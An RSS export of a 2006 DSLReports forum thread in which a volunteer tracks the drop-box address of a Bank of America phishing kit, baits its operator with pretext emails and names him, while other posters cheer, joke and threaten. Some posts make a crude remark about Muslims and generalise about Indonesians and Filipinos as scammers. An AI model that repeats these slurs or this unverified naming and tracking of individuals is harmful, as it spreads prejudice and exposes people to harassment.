<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0" xmlns:blogChannel="http://backend.userland.com/blogChannelModule">

<channel>
<title>Re: [Phishing] Bank of America Phish, caught work in Spam, Scam and Phishbusters</title>
<link>http://www.dslreports.com/forum/r15186645</link>
<description></description>
<language>en</language>
<pubDate>Thu, 03 Dec 2009 02:35:25 EDT</pubDate>
<lastBuildDate>Thu, 03 Dec 2009 02:35:25 EDT</lastBuildDate>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15423383</link>
<description><![CDATA[<A HREF="/useremail/u/314530"><b>NormanS</b></A> : <div class="bquote"><SMALL>said by  Derfel <A HREF="/useremail/u/1020125"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><br><br>Muslims don't like crime.<br> </DIV>Which has what to do with anything? Muslim nations suffer crime (as do a lot of nations, not all of them Muslim); some of which crime isn't criminal in the U.S.<br><div class="bquote">Muslims also don't like having RAM shoved up their rectal cavities.<br> </DIV>Which has what to do with anything? Buddhists, Christians, Hindus, Jews, and Shintoists don't like it, either; but it happens.<br><div class="bquote">Both of these are happening as I post, if my sources are correct.<br> </DIV>I have no way to vet your unnamed sources, so it is your source' words against anybody else' words. If you have something to say, then say it. Just saying, "It ain't so", is not contributing anything useful.<br><SMALL>--<br>Norman<BR>~Oh Lord, why have you come<BR>~To Konnyu, with the Lion and the Drum</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15423383</guid>
<pubDate>Tue, 07 Feb 2006 14:20:40 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15420625</link>
<description><![CDATA[<A HREF="/useremail/u/195618"><b>rawwhide</b></A> : <div class="bquote"><SMALL>said by  izy <A HREF="/useremail/u/205255"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><br><br><div class="bquote"><SMALL>said by  Thaler <A HREF="/useremail/u/945359"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A>  :</SMALL><br><br><div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A>   :</SMALL><br><br>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.</DIV>Please just get your scrawny ass back to farming WoW gold. I still need my epic mount.<br> </DIV>ROFLMAO!!! :D<br> </DIV>12 hours later and I still cant stop laughing, thanks for the good laugh.<br><SMALL>--<br>HUH!!! <A HREF="http://www.sekurecom.com/">Sekurecom</A></SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15420625</guid>
<pubDate>Tue, 07 Feb 2006 04:41:04 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15419726</link>
<description><![CDATA[<A HREF="/useremail/u/254898"><b>pcdebb</b></A> : <div class="bquote"><SMALL>said by  tfrionli <A HREF="/useremail/u/416080"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><br><br>Nice work..<br><br>Macs Restub<br><br>scaM busteR<br><br>:)<br> </DIV>hahaha!!!  I just caught on to that one, that is absolutely hilarious!!<br><br>MGD, you rock ;)<br><SMALL>--<br><A HREF="http://pcdebb.blogspot.com/">babbling</A> | <A HREF="http://www.broadbandreports.com/forum/weather">How's the weather?</A></SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15419726</guid>
<pubDate>Tue, 07 Feb 2006 00:01:59 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15418129</link>
<description><![CDATA[<A HREF="/useremail/u/856446"><b>Scott W</b></A> : ...]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15418129</guid>
<pubDate>Mon, 06 Feb 2006 20:45:55 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15417723</link>
<description><![CDATA[<A HREF="/useremail/u/1020125"><b>Derfel</b></A> : Muslims don't like crime. Muslims also don't like having RAM shoved up their rectal cavities. Both of these are happening as I post, if my sources are correct.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15417723</guid>
<pubDate>Mon, 06 Feb 2006 19:59:17 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15417300</link>
<description><![CDATA[<A HREF="/useremail/u/910659"><b>inteller</b></A> : i think this guy doesnt need to quit his day job (working for Dell tech support)<br><SMALL>--<br>"WHEN THE LAUGH TRACK STARTS THEN THE FUN STARTS!"</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15417300</guid>
<pubDate>Mon, 06 Feb 2006 19:10:44 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15416390</link>
<description><![CDATA[<A HREF="/useremail/u/581232"><b>removed</b></A> : I'm pretty sure he's referring to himself as a baby - someone who has no life experience so far.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15416390</guid>
<pubDate>Mon, 06 Feb 2006 17:13:50 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15416373</link>
<description><![CDATA[<A HREF="/useremail/u/429050"><b>La Luna</b></A> : <div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><br><br>....not true I just new baby born in the earth. Please advice me to be nice people.....<br><br>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.<br><br>Love and Peace<br><br>Purisangeh (.)(.) -- lick it.<br> </DIV>You just graduated from high school and you have a new baby? So this is the kind of person you want to be to your child, a criminal? That's just great.....<br><br>We don't care if you're a Muslim, we only care that you are a criminal, hurting other people. If you have the skills you claim you do, do something good with them. I'm sure your child will think much more highly of you.<br><SMALL>--<br>~~Then the rainstorm came over me and I felt my spirit break; I had lost all of my belief you see, and realized my mistake...~~</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15416373</guid>
<pubDate>Mon, 06 Feb 2006 17:11:06 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15416351</link>
<description><![CDATA[<A HREF="/useremail/u/923463"><b>KyeU</b></A> : What a noob; didn't use a proxy server to send the E-Mail...even I know that and I'm only 17.<br><br>But I have not chosen the dark side, as this talented individual has.<br><br> <BLOCKQUOTE><SMALL>quote:</SMALL><HR>Date of Birth:<br>October 17, 1982 &#9;<br>Age:<br>23<HR></BLOCKQUOTE>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15416351</guid>
<pubDate>Mon, 06 Feb 2006 17:07:20 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15416270</link>
<description><![CDATA[<A HREF="/useremail/u/416080"><b>tfrionli</b></A> : Nice work..<br><br>Macs Restub<br><br>scaM busteR<br><br>:)<br><SMALL>--<br>tfrionli</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15416270</guid>
<pubDate>Mon, 06 Feb 2006 16:56:59 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15415172</link>
<description><![CDATA[<A HREF="/useremail/u/1324349"><b>ass assassin</b></A> : just turn him into bank of america.. i mean, a 50 billion dollar a year bank sure would be interested in talking to him, along with the secret service and fbi..  this boy has made a big mistake.. <br><br>from the bank of america website:<br><br>Email and online fraud <br><br>To report a suspicious email that uses Bank of America's name, forward it to us immediately at abuse@bankofamerica.com. (If you have general questions about the bank or your accounts, please go to Contact Us.) <br>Learn more about online fraud and email fraud. <br>See an example of a fraudulent email <br><br> <br>Suspect you are a victim of fraud? <br>Report fraudulent activity not associated with Online Banking:<br> <br><br>In California CA: 800-678-1433 <br>In Idaho and Washington ID, WA: 800.442.6680 <br>All others states: 800-432-1000 <br><br> <br>Report fraudulent activity within Online Banking:<br> <br><br>In California CA: 800-792-0808 <br>In Idaho and Washington ID, WA: 800-442-6680 <br>All other states: 800-933-6262  <br><br>I am sure they would be interested in getting someone like this.. sure would help their corporate image and fighting phishing scams and such, eh?]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415172</guid>
<pubDate>Mon, 06 Feb 2006 15:45:48 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15415691</link>
<description><![CDATA[<A HREF="/useremail/u/205255"><b>izy</b></A> : <div class="bquote"><SMALL>said by  Thaler <A HREF="/useremail/u/945359"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR><div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A>  :</SMALL><BR><BR>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.</DIV>Please just get your scrawny ass back to farming WoW gold. I still need my epic mount.<br> </DIV>ROFLMAO!!! :D]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415691</guid>
<pubDate>Mon, 06 Feb 2006 15:42:05 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15415600</link>
<description><![CDATA[<A HREF="/useremail/u/945359"><b>Thaler</b></A> : <div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.</DIV>Please just get your scrawny ass back to farming WoW gold. I still need my epic mount.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415600</guid>
<pubDate>Mon, 06 Feb 2006 15:28:39 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15415478</link>
<description><![CDATA[<A HREF="/useremail/u/705588"><b>91439306</b></A> : It's because these nations have very corrupt governments and the people are profoundly impoverished because of the economic results of corruption.<br>My stay in the Philippines (Taguig, Pasay, Baguio areas) taught me alot about the nature of people. There are some that will accept their poverty and immerse themselves in religion on the hope of salvation at death, viewing this as a prelude to an eternal life in "heaven", and there are those who are probably, for lack of a better term, not sucked in by that religious BS and do the only easy thing they know how to, with their new found computer skills. So they resort to spamming and scamming.<br>Having lived in such a country for a while, I can appreciate the utter hopeless situation of economics there. There is NO way to be a success in the Philippines, unless you're Lea Salonga, a popular singer, liked by all Filipinos, or unless you are one of the few lucky ones to get out of the country by marrying a foreigner.<br>That doesn't change the fact that what the scammers do is totally wrong and subject to severe penalties. It only serves to answer the implicit question: "Why?"<br><SMALL>--<br>Take care,<BR><BR>Mark & Mary Ann Weiss<BR><BR>Hear my Kurzweil Creations at: &raquo;<A HREF="http://www.dv-clips.com/theater.htm" >www.dv-clips.com/theater.htm</A><BR>'&raquo;<A HREF="http://www.mwcomms.com/auctions.htm" >www.mwcomms.com/auctions.htm</A><BR>'&raquo;<A HREF="http://www.mwcomms.com" >www.mwcomms.com</A><BR>'&raquo;<A HREF="http://www.adventuresinanimemusic.com" >www.adventuresinanimemusic.com</A><BR> Stereo Feed!</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415478</guid>
<pubDate>Mon, 06 Feb 2006 15:09:32 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15415254</link>
<description><![CDATA[<A HREF="/useremail/u/282779"><b>Jon Geb</b></A> : Why does it seem that Indonesia, Philippines and all these countries are so full of scammers. Its been this way for years.<br><br>I remember about 5 years ago I was looking for a second job and saw an ad in the Detroit News for a "courier" position. I called it and got some American telling me the job was to empty pay phones and deposit the money into a specific account. He told me the job was contracted by the local bell phone companies.<br><br>It sounded odd and then he went on to tell me I had to pay a deposit of $400 in order to get started. The alarm started going off right when I heard that. So I humored him and asked him where I was to send the money and info. The address was the Philippines.<br><br>Needless to say I knew the scam right then and there.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415254</guid>
<pubDate>Mon, 06 Feb 2006 14:32:55 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15414952</link>
<description><![CDATA[<A HREF="/useremail/u/1239522"><b>ScottK1</b></A> : Oh, this is perfect.  You have the cajones to committ a felony that could potentially cost innocent people (who work for a living unlike yourself) thousands upon thousands of dollars, and yet you want us to go easy on you because you are a youngster, probably about 17 or thereabouts.  People have been going easy on your for your entire life, and it is finally time for you to be a man and face the consequences of your choice. This is, as kids your age like to say, "some serious shit."<br><br>If you don't appreciate the seriousness of what you have done, look at it this way:  In essence, you have just attempted a bank robbery. Let's add attempted identity theft to the charges as well.  Think you better take your shorts off and have your mommy wash them...you just peed your pants, didn't you?]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15414952</guid>
<pubDate>Mon, 06 Feb 2006 13:51:27 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15414934</link>
<description><![CDATA[<A HREF="/useremail/u/582272"><b>RyanG1</b></A> : I agree, you have my vote as well as any resources i have that youd need, just drop a line.<br><br>Keep up the good work.<br><br>Ryan<br><SMALL>--<br>Oh I wish i was an oscar meyer wiener, then everyone would be in love with me....</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15414934</guid>
<pubDate>Mon, 06 Feb 2006 13:48:46 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15414851</link>
<description><![CDATA[<A HREF="/useremail/u/564018"><b>Shack</b></A> :   Great Job!  Take down this POS.  Even though must of the people who this will benefit wil never know to thank you, I will do it in there place.  Thanks.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15414851</guid>
<pubDate>Mon, 06 Feb 2006 13:37:57 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15414802</link>
<description><![CDATA[<A HREF="/useremail/u/1305066"><b>briartech</b></A> : <div class="bquote"><SMALL>said by  catseyenu <A HREF="/useremail/u/517760"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR>I've got some Indonesian contacts tracking him now.<br>He'd better not have any "nervous" associates or he's toast.<br> </DIV>I know who you are too, so I know that what you said is true. Sooner or later, we'll all be watching one another.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15414802</guid>
<pubDate>Mon, 06 Feb 2006 13:30:15 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15403870</link>
<description><![CDATA[<A HREF="/useremail/u/279131"><b>jig</b></A> : haven't been back to Indonesia/Jakarta since 9/11, but i still have some friends there... heh, might take some bribes to get the police involved, however.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15403870</guid>
<pubDate>Sat, 04 Feb 2006 19:19:13 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15402208</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : <div class="bquote"><SMALL>said by  waldoooo <A HREF="/useremail/u/540015"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR> ....I doubt anyone tipped him off, google his name again and guess whats on the top of the list<br> </DIV>Yep, finally got his name in lights, hit the big time at last.<br><br>Actually, this one is just as interesting: &raquo;<A HREF="http://www.tempointeractive.com/komentar/?berita=brk,20051011-67813,uk.html&act=read" >www.tempointeractive.com/komenta&middot;&middot;&middot;act=read</A> While he is working on his phishing scams he is also posting locally. Way to go Ariando !! maybe you will get some "police pressure" soon!. On that post you listed Yogyakarta as your home. I thought you were a a jazz musician from New Zealand.? ;) Very confident huh?, you must have thought that no one would ever crack your phishes, and see your email address. <br><br>MGD<div class="borderless"><TABLE WIDTH=95% align=center border=0 CELLPADDING=4"><TR><TD ALIGN=CENTER VALIGN=CENTER BGCOLOR=#FFFFFF nwrap COLSPAN=3 WIDTH=100%><A HREF="/speak/slideshow/15402208?c=962658&ret=L2ZvcnVtL3IxNTE4NjY0NS54bWw%3D"><IMG class="apic" BORDER=0 TITLE="58935 bytes" WIDTH=600 HEIGHT=433 SRC="/r0/download/962658.thumb600~80f0e67c693bcfe0f820b8d6878b55d6/Ariando.png/thumb.jpg" ALT="Click for full size"></A></TD></TABLE></div>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15402208</guid>
<pubDate>Sat, 04 Feb 2006 14:50:31 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15401953</link>
<description><![CDATA[<A HREF="/useremail/u/540015"><b>waldoooo</b></A> :  <BLOCKQUOTE><SMALL>quote:</SMALL><HR>reply to Anon<br>Re: [Phishing] Bank of America Phish, caught work<br><br>I guess someone must have sent you a "HEADS UP"<HR></BLOCKQUOTE><br><br>I doubt anyone tipped him off, google his name again and guess whats on the top of the list]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15401953</guid>
<pubDate>Sat, 04 Feb 2006 14:07:57 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15399930</link>
<description><![CDATA[<A HREF="/useremail/u/517760"><b>catseyenu</b></A> : I've got some Indonesian contacts tracking him now.<br>He'd better not have any "nervous" associates or he's toast.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15399930</guid>
<pubDate>Sat, 04 Feb 2006 05:32:37 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15398895</link>
<description><![CDATA[<A HREF="/useremail/u/1116779"><b>spanishbob</b></A> : Enjoying this one, will follow.  Would be nice to see this little $hitbag caught.  Does FBI coordinate with local police to catch these guys? Even Kiwis have better spelling than that!]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15398895</guid>
<pubDate>Sat, 04 Feb 2006 00:03:56 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15398507</link>
<description><![CDATA[<A HREF="/useremail/u/0"><b>anon</b></A> : MGD thats hilarious!  Good post, most of those phishers are just wanna-be's trying to make a buck the wrong way.  Sooner or later is always catches up, whether its police or someone knocking on thier door .....   that post is hilarious!]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15398507</guid>
<pubDate>Fri, 03 Feb 2006 23:06:07 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15397407</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : I guess someone must have sent you a "HEADS UP" <br><br><div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A>  :</SMALL><BR><BR>Thank you Macs Retsub for your Big mouth ...... You want be a hero here? </DIV>Hey that's only a small price that you pay for being a thief and a criminal. Nope, I am not a hero, I just volunteer my time and forensic cyber skills to try and prevent victims from being defrauded.<br><br>You are now a member, read my scam hunting posts. I am an "equal opportunity" scam hunter. I follow the trail wherever it leads. Scammers are everywhere, they come in all shapes, sizes, and religions.<br><br><div class="bquote">....You do not have enough proof to catch me....</DIV> <br>Don't bet on it junior!!! Maybe you will read an article about this in your local paper <A HREF="http://www.pikiran-rakyat.co.id/cetak/">Pikiran Rakyat</A><br>. I am sure that the people of Bandung do not like thieves any more than we do.<br><br><div class="bquote">I hope I can see you as soon as possible, to disccuss our future....</DIV> <br><br>Sure, just so long as your future includes paying a price for your crimes. I have found your fingerprints on many other phishes, so you have been doing this for a while.<br><br><div class="bquote">I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet.....</DIV>Great, so why are you using those skills to commit crimes??<br>instead of doing productive work. Will the universities let you in if they know what you are doing.<br><br>Do not be an idiot and bring race and religion into to it. You are a criminal, you got busted !! Face up to it junior..<br><br>You spend a lot of time at that Internet Cafe, do you work or live there?? Your emails came from 3 different IP's at the Cafe within a few hours.<br><br>MGD<br><br><SMALL>Edit+added link</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15397407</guid>
<pubDate>Fri, 03 Feb 2006 20:19:00 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15395992</link>
<description><![CDATA[<A HREF="/useremail/u/581232"><b>removed</b></A> : You must not be that good if ol'  MGD <A HREF="/useremail/u/666842"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> found you. :)]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15395992</guid>
<pubDate>Fri, 03 Feb 2006 17:13:52 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15395983</link>
<description><![CDATA[<A HREF="/useremail/u/1323263"><b>purisangeh</b></A> : Thank you Macs Retsub for your Big mouth to all pigs here. You want be a hero here? I advice you that wash your feet and take a nap your mommy waiting you.<br><br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>Date: Thu, 2 Feb 2006 16:26:47 -0500 <br>From: "Macs Retsub"   Add to Address Book  Add Mobile Alert <br>Yahoo! DomainKeys has confirmed that this message was sent by gmail.com. Learn more <br>To: "ariando huge"  <br>Subject: Re: Kaskus <br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>around hundreds peoples around you doing spam. Why you not againts them near you ?? I have been seen your people, on my cyber cafe. You do not have enough proof to catch me. I hope I can see you as soon as possible, to disccuss our future. I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet and i just graduated my senior high school. I am hacker? not true I just new baby born in the earth. Please advice me to be nice people.<br><br>I hope God Bless you all.<br><br>Our Father Who art in Heaven, hallowd be thy name, thy kingdom come .....<br><br>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.<br><br>Love and Peace<br><br>Purisangeh (.)(.) -- lick it.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15395983</guid>
<pubDate>Fri, 03 Feb 2006 17:12:33 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15394477</link>
<description><![CDATA[<A HREF="/useremail/u/540015"><b>waldoooo</b></A> : I like following the threads of MGD & crew as they help "would be" victims and shut down the thiefs.  I don't know how Yahoo or the other companies work but it would seem to me that with a few emails to some of the "higher ups" in the companies showing the amount of people helped and scams broken up by MGD and the group here you guys should be able to get either a phone # or at least a direct email address to a support person  who could take action and shut down the fradulent accounts.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15394477</guid>
<pubDate>Fri, 03 Feb 2006 13:45:06 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15394308</link>
<description><![CDATA[<A HREF="/useremail/u/387481"><b>daniyel</b></A> : Good work  - that's the way it's done. I had an instance(few of them) where we had AOL employee site posted on our web servers in the middle of the night. By AM, there was already enough hits generated(by emailing internal emp notice/chass pass/update account) to be quite scary, for AOL. I found the creator of the account, ICQ account member the info was being sent after decrypting a cheesy html algorithm. Hosting company didn't want to do anything except turn the accounts off - and refund charges to stolen CC's. After the 6th-7th account, and getting them turned off rapidly, phishers went away and bothered some other host. ]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15394308</guid>
<pubDate>Fri, 03 Feb 2006 13:23:45 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15393212</link>
<description><![CDATA[<A HREF="/useremail/u/1031550"><b>tapeloop</b></A> : MGD, more power to you my brother.  I wish I knew Bahasa so I could help you slam dunk this guy.  Keep up the good work and keep us posted.<br><SMALL>--<br>Copyright infringement is illegal. Murder is illegal. Therefore, file sharing is murder.</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15393212</guid>
<pubDate>Fri, 03 Feb 2006 11:05:11 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15392937</link>
<description><![CDATA[<A HREF="/useremail/u/475168"><b>pleekmo</b></A> : <div class="bquote"><SMALL>said by Ummmyea :</SMALL><br><br>How is your email not traceable?<br> </DIV>Anonymous re-mailer, perhaps.<br><SMALL>--<br>HCN: Because you deserve a rest!<BR><BR>I wonder what Spock would have to say (or do) about <I>Omelas</I>?</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15392937</guid>
<pubDate>Fri, 03 Feb 2006 10:27:31 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15392864</link>
<description><![CDATA[<A HREF="/useremail/u/0"><b>anon</b></A> : How is your email not traceable?]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15392864</guid>
<pubDate>Fri, 03 Feb 2006 10:17:46 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15391819</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : Interesting follow up:<br><br>Though the digging through phishes looking for and extracting the email drop boxes is both tedious and time consuming, what irks me the most is the failure of the majors to yank the accounts despite frequent larts. If these drop box accounts were pulled promptly, it would prevent the phised data from being recovered. Now that most of the email providers have forsaken the abuse@ and gone to online forms for complaints (Gmail,Yahoo etc.), they have no easy method for reporting them. Getting clueless replies requesting the email headers from the "offending account", despite including snippets from the code clearly indentifying the email address as part of a scam, is frustrating. By the time the issue is escalated to a clued rep, the data is long gone.<br><br>With that in mind, I sometimes go back a few weeks afterwards, and recheck the dpop accounts to see if they were cancelled. In addition to using the Rcp to @ the mx server, I also send an email to the address to see if it bounces. I usually include some benign reference to the Phish to see if I can elicit a response, and every now and then I get one.<br><br>Two days ago I tested the purisangeh_team@yahoo.com drop box on this BOA phish, now over a month old. I always want to include some trigger in the subject line to try and get attention. In this case I listed the subject as "KASKUS" which is a Indonesian chat forum that was one of the few places where the name Purisangeh had turned up as a poster: &raquo;<A HREF="http://www.kaskus.com/member.php?u=69571" >www.kaskus.com/member.php?u=69571</A> Indonesia became a focus since a previous identical BOA phish which was reported in NANAS on 12/05, was also emailed via the exact same open proxy as this one: &raquo;<A HREF="http://groups.google.com/group/news.admin.net-abuse.sightings/browse_frm/thread/ca18234941121d78/18e0f993e0261745?lnk=st&q=66.235.195.160&rnum=4&hl=en#18e0f993e0261745" >groups.google.com/group/news.adm&middot;&middot;&middot;e0261745</A> Coincidentally that phish site was hosted on a hijacked box in Indonesia.<br><br>So I sent off the following email to the phish drop box:<br><br><HR><I>From: Macs Retsub <br>To: purisangeh_team@yahoo.com<br>Date: Feb 1, 2006 5:53 PM<br>Subject: Kaskus<br><br>Hey, I still have the files from the Bank of America phish.<br>The address  rdcpt0809@airpost.com  is dead.<br>Which other one can I use??  <br> <br>I have the logs too.</I><HR><br><br>I try to make them fuzzy, but throw in a few clues, and hope they respond with their guard down. Well about 24 hours later in pops this:<br><br><HR><I>From: ariando huge <br>To: Macs Retsub <br>Date: Feb 2, 2006 4:06 AM<br>Subject: Re: Kaskus<br><br>What are you talking about???</I><HR><br><br>Ahh, got a hit !! so I responded with some more info, and included a snippet of the BOA phish processing script showing the data collection address.<br><br><HR><I>From: Macs Retsub   <br>To: ariando huge <br>Date: Feb 2, 2006 12:16 PM<br>Subject: Re: Kaskus<br><br>The data from the credit card and 